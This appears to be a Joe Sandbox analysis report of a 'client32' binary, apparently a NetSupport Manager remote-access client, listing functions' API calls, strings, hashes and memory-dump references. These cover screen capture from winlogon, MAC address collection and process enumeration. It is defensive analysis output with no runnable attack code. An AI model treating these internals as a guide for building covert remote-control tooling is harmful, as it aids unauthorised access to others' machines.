Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6

Function 1101DB70 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 361windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101DC00
GetWindowTextLengthA.USER32 ref: 1101DC09
SendMessageA.USER32(00000000,000000B1,00000001,00000001), ref: 1101DC1E
_memset.LIBCMT ref: 1101DC2F
SendMessageA.USER32(00000000,0000043A,00000000,?), ref: 1101DC56
SendMessageA.USER32(00000000,0000043A,00000001,?), ref: 1101DC6E
SendMessageA.USER32(00000000,00000444,00000001,?), ref: 1101DCD0
LoadBitmapA.USER32(00000000,000013CD,Chat,DisableSmileys,00000000,00000000), ref: 1101DD0F
GetObjectA.GDI32(00000000,00000018,?), ref: 1101DD25

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101DD3C, 1101DF55
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1101DE68
DisableSmileys, xrefs: 1101DCE7
m_hWnd, xrefs: 1101DD41, 1101DF5A
IsA(), xrefs: 1101DE6D
Chat, xrefs: 1101DCEC

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$BitmapItemLengthLoadObjectTextWindow__strdup_free_memset
String ID: Chat$DisableSmileys$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3923228642-2891806625
Opcode ID: 04eb4f30466536429864cbd1def46a5f60d12b69a096afe9f455f201eb3f667d
Instruction ID: c13073a30208fefd3b033e8a449f5569f8ab98db58b479f73fba8d4c12dbe919
Opcode Fuzzy Hash: 04eb4f30466536429864cbd1def46a5f60d12b69a096afe9f455f201eb3f667d
Instruction Fuzzy Hash: 49D1A775E00229ABEB24DF64CC85F9EB7B4BF44704F0081D9F919AB284DB74A944CF60

Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll), ref: 1103D576
GetProcAddress.KERNEL32(00000000,Netbios), ref: 1103D590
_memset.LIBCMT ref: 1103D5AB
_memset.LIBCMT ref: 1103D605
_memset.LIBCMT ref: 1103D635
wsprintfA.USER32 ref: 1103D6EE
FreeLibrary.KERNEL32(?), ref: 1103D747
FreeLibrary.KERNEL32(?), ref: 1103D779
LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 1103D793
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 1103D7AF
_malloc.LIBCMT ref: 1103D811
wsprintfA.USER32 ref: 1103D8C8

Strings

IPHLPAPI.DLL, xrefs: 1103D78E
GetAdaptersInfo, xrefs: 1103D7A9
%02x%02x%02x%02x%02x%02x, xrefs: 1103D6E8, 1103D8BC
3, xrefs: 1103D697
Netbios, xrefs: 1103D58A
Info. Set MacAddr to %s, xrefs: 1103DA2B
* , xrefs: 1103D647
Info. Unable to load netapi32, xrefs: 1103D781
TCPIP, xrefs: 1103D564
pGetAdaptersInfo, xrefs: 1103D7C5
Info. macaddr[%d]=%s, ipaddr=%hs/%hs, xrefs: 1103D912
Info. Netbios macaddr=%s, xrefs: 1103D70F
netapi32.dll, xrefs: 1103D571
Warning. Netbios() returned x%x, xrefs: 1103D74F
ListenAddress, xrefs: 1103D55F
CLTCONN.CPP, xrefs: 1103D7C0
%d adapters in chain, %d adapters by size, xrefs: 1103D851
VIRTNET, xrefs: 1103D8E9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
API String ID: 2942389153-3574733319
Opcode ID: cb3c14f1a98fb24556e4b97b91084b05bb62dea3d0a9033288369c69c8ea19ce
Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
Opcode Fuzzy Hash: cb3c14f1a98fb24556e4b97b91084b05bb62dea3d0a9033288369c69c8ea19ce
Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61

Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
WaitForMultipleObjects.KERNEL32 ref: 110B3183
OpenFileMappingA.KERNEL32 ref: 110B31A6
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
GetDC.USER32(00000000), ref: 110B31E8
CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
SelectObject.GDI32(00000000,00000000), ref: 110B3236
GetTickCount.KERNEL32 ref: 110B323F
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
GetTickCount.KERNEL32 ref: 110B327F
GetLastError.KERNEL32(00000000), ref: 110B328E
GdiFlush.GDI32 ref: 110B32A2
SelectObject.GDI32(00000000,?), ref: 110B32AD
DeleteObject.GDI32(00000000), ref: 110B32B4
SetEvent.KERNEL32(?), ref: 110B32BE
DeleteDC.GDI32(00000000), ref: 110B32C8
ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
CloseHandle.KERNEL32(00000000), ref: 110B32E5
CloseHandle.KERNEL32(00000000), ref: 110B3309

Strings

Client32DIB, xrefs: 110B319A
Client32DIBBlit, xrefs: 110B3132
ERROR %d blitting from winlogon, took %d ms, xrefs: 110B3295
ScrapeApp, xrefs: 110B3111
Client32DIBDone, xrefs: 110B3143
Client32DIBQuit, xrefs: 110B3124

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
API String ID: 2071925733-2101319552
Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65

Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975

GetObjectA.GDI32(?,0000003C,?), ref: 110054E5

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

wsprintfA.USER32 ref: 1100553D
DeleteObject.GDI32(?), ref: 11005592
DeleteObject.GDI32(?), ref: 1100559B
SelectObject.GDI32(?,?), ref: 110055B2
DeleteObject.GDI32(?), ref: 110055B8
DeleteDC.GDI32(?), ref: 110055BE
SelectObject.GDI32(?,?), ref: 110055CF
DeleteObject.GDI32(?), ref: 110055D8
DeleteDC.GDI32(?), ref: 110055DE
DeleteObject.GDI32(?), ref: 110055EF
DeleteObject.GDI32(?), ref: 1100561A
DeleteObject.GDI32(?), ref: 11005638
DeleteObject.GDI32(?), ref: 11005641
ShowWindow.USER32(?,00000009), ref: 1100566F
PostQuitMessage.USER32(00000000), ref: 11005677

Strings

PenStyle, xrefs: 1100546F
PenWidth, xrefs: 1100548D
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005537
FillStyle, xrefs: 110054C9
FillColour, xrefs: 110054AB
Tool, xrefs: 11005433
Font, xrefs: 1100554F
PenColour, xrefs: 11005451
Annotate, xrefs: 11005438, 11005456, 11005474, 11005492, 110054B0, 110054CE, 11005554

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
Opcode Fuzzy Hash: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60

Function 11015840 Relevance: 43.7, APIs: 29, Instructions: 170COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 1101586F
GetWindowRect.USER32(?,?), ref: 11015887
_memset.LIBCMT ref: 11015895
CreateFontIndirectA.GDI32(?), ref: 110158B1
SelectObject.GDI32(00000000,00000000), ref: 110158C5
SetBkMode.GDI32(00000000,00000001), ref: 110158D0
BeginPath.GDI32(00000000), ref: 110158DD
TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
EndPath.GDI32(00000000), ref: 11015907
PathToRegion.GDI32(00000000), ref: 1101590E
CreateSolidBrush.GDI32(?), ref: 11015920
CreateSolidBrush.GDI32(?), ref: 11015936
CreatePen.GDI32(00000000,00000002,?), ref: 11015950
SelectObject.GDI32(00000000,00000000), ref: 1101595E
SelectObject.GDI32(00000000,?), ref: 1101596E
GetRgnBox.GDI32(00000000,?), ref: 1101597B
OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
DeleteObject.GDI32(00000000), ref: 110159C9
SelectObject.GDI32(00000000,?), ref: 110159D3
SelectObject.GDI32(00000000,?), ref: 110159DD
DeleteObject.GDI32(?), ref: 110159E6
DeleteObject.GDI32(?), ref: 110159EF
DeleteObject.GDI32(?), ref: 110159F8
SelectObject.GDI32(00000000,?), ref: 11015A02
DeleteObject.GDI32(?), ref: 11015A0B
SetBkMode.GDI32(00000000,?), ref: 11015A15
EndPaint.USER32(?,?), ref: 11015A29

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
String ID:
API String ID: 3702029449-0
Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61

Function 11003800 Relevance: 40.7, APIs: 27, Instructions: 240COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 1100385F
InflateRect.USER32 ref: 1100387A
GetSysColor.USER32(00000010), ref: 1100388D
GetSysColor.USER32(00000010), ref: 110038A4
GetSysColor.USER32(00000014), ref: 110038BB
GetSysColor.USER32(00000014), ref: 110038D2
GetSysColor.USER32(00000014), ref: 110038F5
GetSysColor.USER32(00000014), ref: 1100390C
GetSysColor.USER32(00000010), ref: 11003923
GetSysColor.USER32(00000010), ref: 1100393A
GetSysColor.USER32(00000004), ref: 11003951
SetBkColor.GDI32(00000000,00000000), ref: 11003958
InflateRect.USER32 ref: 11003966
GetSysColor.USER32(00000010), ref: 11003982
CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
SelectObject.GDI32(00000000,00000000), ref: 11003999
MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
LineTo.GDI32(00000000,?,?), ref: 110039C6
SelectObject.GDI32(00000000,?), ref: 110039D4
DeleteObject.GDI32(?), ref: 110039DE
GetSysColor.USER32(00000014), ref: 110039EC
CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
SelectObject.GDI32(00000000,00000000), ref: 11003A02
MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
LineTo.GDI32(00000000,?,?), ref: 11003A35
SelectObject.GDI32(00000000,?), ref: 11003A43
DeleteObject.GDI32(00000000), ref: 11003A4A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
String ID:
API String ID: 1903512896-0
Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0

Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll), ref: 1110708D

Part of subcall function 11138260: GetVersion.KERNEL32(00000000,756F4977,00000000), ref: 11138283
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7

FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11107116
GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId,?,1110809F), ref: 111071A0
GetProcAddress.KERNEL32(00000000,EnumProcesses,?,1110809F), ref: 111071F1
GetProcAddress.KERNEL32(?,ProcessIdToSessionId,?,1110809F), ref: 1110726A
SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0

Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336

CloseHandle.KERNEL32(00000000), ref: 11107446

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
CloseHandle.KERNEL32(?), ref: 1110743F
FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3

Strings

winlogon.exe, xrefs: 111073D4
Kernel32.dll, xrefs: 11107111
EnumProcesses, xrefs: 111071DF
WTSGetActiveConsoleSessionId, xrefs: 11107184
dwm.exe, xrefs: 111073BB
psapi.dll, xrefs: 11107088
ProcessIdToSessionId, xrefs: 11107264

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
API String ID: 348974188-2591373181
Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51

Function 110EF8E0 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 110EF8FE
GetStockObject.GDI32(0000000F), ref: 110EF912
GetDC.USER32(00000000), ref: 110EF98A
SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF99B
RealizePalette.GDI32(00000000), ref: 110EF9A1
GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF9BC
SelectPalette.GDI32(00000000,?,00000001), ref: 110EF9D0
RealizePalette.GDI32(00000000), ref: 110EF9D3
ReleaseDC.USER32(00000000,00000000), ref: 110EF9DB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
String ID:
API String ID: 1969595663-0
